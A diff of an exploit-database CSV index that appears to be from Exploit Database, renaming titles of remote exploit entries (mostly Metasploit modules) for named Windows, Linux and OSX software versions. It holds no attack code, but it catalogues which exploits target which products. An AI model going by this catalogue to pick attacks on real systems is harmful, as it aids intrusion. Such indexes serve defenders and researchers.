16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent - Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 +16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent - Remote Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -11224,7 +11234,7 @@ id,file,description,date,author,platform,type,port 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 +16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -11373,7 +11383,7 @@ id,file,description,date,author,platform,type,port 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 -16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 +16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 @@ -11387,7 +11397,7 @@ id,file,description,date,author,platform,type,port 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 @@ -11404,13 +11414,13 @@ id,file,description,date,author,platform,type,port 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 -16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 @@ -11429,7 +11439,7 @@ id,file,description,date,author,platform,type,port 16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093 16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)",2010-05-09,Metasploit,windows,remote,2103 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0 +16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16752,platforms/windows/remote/16752.rb,"Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 @@ -11445,12 +11455,12 @@ id,file,description,date,author,platform,type,port 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,windows,remote,0 -16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 +16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail Server 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,8008 -16770,platforms/windows/remote/16770.rb,"Savant Web Server 3.1 - Overflow (Metasploit)",2010-10-04,Metasploit,windows,remote,0 +16770,platforms/windows/remote/16770.rb,"Savant Web Server 3.1 - Remote Overflow (Metasploit)",2010-10-04,Metasploit,windows,remote,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028 @@ -11463,7 +11473,7 @@ id,file,description,date,author,platform,type,port 16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0 -16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 +16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144 @@ -11526,7 +11536,7 @@ id,file,description,date,author,platform,type,port 16845,platforms/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 -16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 +16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 @@ -11536,11 +11546,11 @@ id,file,description,date,author,platform,type,port 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0 -16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0 +16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0 16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Overflow (Metasploit)",2010-05-09,Metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,hardware,remote,0 @@ -11551,9 +11561,9 @@ id,file,description,date,author,platform,type,port 16873,platforms/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 -16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 +16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16903,platforms/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0 @@ -11589,7 +11599,7 @@ id,file,description,date,author,platform,type,port 17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote,0 -17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote",2011-03-23,"Jeremy Brown",windows,remote,0 +17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - 'TCPUploadServer' Remote File System",2011-03-23,"Jeremy Brown",windows,remote,0 17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager (OV NNM) - 'snmpviewer.exe' Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 @@ -11665,7 +11675,7 @@ id,file,description,date,author,platform,type,port 17491,platforms/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,Metasploit,unix,remote,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 -39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 +39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Remote Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - Man In The Middle",2011-07-09,Nibin,windows,remote,0 @@ -11705,7 +11715,7 @@ id,file,description,date,author,platform,type,port 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,windows,remote,0 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,windows,remote,0 -17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe'",2011-08-26,"Canberk BOLAT",windows,remote,0 +17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow",2011-08-26,"Canberk BOLAT",windows,remote,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,windows,remote,0 17810,platforms/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 @@ -11726,7 +11736,7 @@ id,file,description,date,author,platform,type,port 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0 -17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote",2011-10-11,kingcope,windows,remote,0 +17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Command Execution",2011-10-11,kingcope,windows,remote,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote,0 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow (Metasploit)",2011-10-20,Metasploit,cgi,remote,0 @@ -11760,7 +11770,7 @@ id,file,description,date,author,platform,type,port 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,hardware,remote,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST 'RRQ' Buffer Overflow",2012-01-10,b33f,windows,remote,0 -18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter)",2012-01-12,TheXero,windows,remote,0 +18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter)",2012-01-12,TheXero,windows,remote,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 @@ -11775,7 +11785,7 @@ id,file,description,date,author,platform,type,port 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow (Metasploit)",2012-04-04,Metasploit,windows,remote,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 -18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 +18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,windows,remote,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote,0 18442,platforms/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 @@ -11790,7 +11800,7 @@ id,file,description,date,author,platform,type,port 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,windows,remote,0 18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - 'CmdProcessor.exe' Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote,0 -18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()'",2012-02-27,pa_kt,windows,remote,0 +18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow",2012-02-27,pa_kt,windows,remote,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated (SEH)",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - 'ipswcom.dll' ActiveX Stack Buffer Overflow (Metasploit)",2012-02-29,Metasploit,windows,remote,0 @@ -11801,8 +11811,8 @@ id,file,description,date,author,platform,type,port 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH 'Username' Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 -18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote,0 -18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Remote",2012-03-19,kingcope,multiple,remote,0 +18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4 cprt' Remote Overflow (Metasploit)",2012-03-08,Metasploit,windows,remote,0 +18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Account Scanner / 'PUT' Request Command Execution",2012-03-19,kingcope,multiple,remote,0 18604,platforms/windows/remote/18604.rb,"Netmechanica NetDecision HTTP Server 4.5.1 - Buffer Overflow (Metasploit)",2012-03-15,Metasploit,windows,remote,0 18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,windows,remote,0 18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 @@ -11836,7 +11846,7 @@ id,file,description,date,author,platform,type,port 18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote,0 18833,platforms/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection (Metasploit)",2012-05-04,Metasploit,windows,remote,0 -18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()'",2012-04-30,rgod,windows,remote,0 +18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution",2012-04-30,rgod,windows,remote,0 18812,platforms/windows/remote/18812.rb,"McAfee 